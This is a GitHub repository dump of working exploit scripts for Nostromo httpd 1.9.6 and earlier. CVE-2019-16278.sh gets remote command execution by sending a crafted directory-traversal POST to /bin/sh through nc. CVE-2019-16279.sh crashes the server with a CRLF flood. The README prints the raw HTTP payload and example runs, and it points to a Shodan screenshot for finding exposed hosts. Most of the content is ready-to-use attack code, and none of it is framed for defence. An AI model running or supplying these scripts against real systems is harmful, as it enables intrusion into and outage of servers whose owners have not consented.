├── CVE-2019-16278.jpg ├── CVE-2019-16278.png ├── CVE-2019-16278.sh ├── CVE-2019-16279.sh ├── Nostromo.jpg ├── README.md └── shodan.jpg /CVE-2019-16278.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-16278/8e43b7399e5b12b6595ec65b43d91b67de529362/CVE-2019-16278.jpg -------------------------------------------------------------------------------- /CVE-2019-16278.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-16278/8e43b7399e5b12b6595ec65b43d91b67de529362/CVE-2019-16278.png -------------------------------------------------------------------------------- /CVE-2019-16278.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | HOST="$1" 4 | PORT="$2" 5 | shift 2 6 | 7 | ( \ 8 | echo -n -e 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n'; \ 9 | echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \ 10 | echo "$@ 2>&1" \ 11 | ) | nc "$HOST" "$PORT" \ 12 | | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP' 13 | 14 | 15 | -------------------------------------------------------------------------------- /CVE-2019-16279.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | HOST="$1" 4 | PORT="$2" 5 | 6 | echo -n -e '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n' | nc "$HOST" "$PORT" 7 | 8 | -------------------------------------------------------------------------------- /Nostromo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-16278/8e43b7399e5b12b6595ec65b43d91b67de529362/Nostromo.jpg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Exploits for CVE-2019-16278 and CVE-2019-16279 2 | 3 | Nostromo httpd is prone to 2 cricital vulnerabilities for versions <= 1.9.6 (0day =]) first one is an RCE through directory transversal, second one is a DoS 4 | 5 | ### [CVE-2019-16278](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16278) - Directory transversal to remote code execution 6 | ![](./Nostromo.jpg) 7 | ![](./CVE-2019-16278.jpg) 8 | ![](./CVE-2019-16278.png) 9 | ![](./shodan.jpg) 10 | 11 | ``` 12 | POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0 13 | Connection: close 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 15 | Content-Length: 25 16 | 17 | echo 18 | echo 19 | ifconfig 2>&1 20 | ``` 21 | 22 | This bug is due to an incomplete fix for [CVE-2011-0751](https://nvd.nist.gov/vuln/detail/CVE-2011-0751). We can bypass a check for `/../` which allows us to execute `/bin/sh` with arbitrary arguments. 23 | 24 | Example 25 | 26 | $ ./CVE-2019-16278.sh 127.0.0.1 8080 id 27 | uid=1001(sp0re) gid=1001(sp0re) groups=1001(sp0re) 28 | 29 | 30 | ### [CVE-2019-16279](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16279) - Denial of Service 31 | 32 | This bug exploit a memory error when sending too many `\r\n` in a single connexion. 33 | 34 | Example 35 | 36 | $ curl http://127.0.0.1:8080 37 | HELLO! 38 | $ ./CVE-2019-16279.sh 127.0.0.1 8080 39 | $ curl http://127.0.0.1:8080 40 | curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused 41 | 42 | ## 参考链接: 43 | 44 | https://git.sp0re.sh/sp0re/Nhttpd-exploits 45 | -------------------------------------------------------------------------------- /shodan.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-16278/8e43b7399e5b12b6595ec65b43d91b67de529362/shodan.jpg --------------------------------------------------------------------------------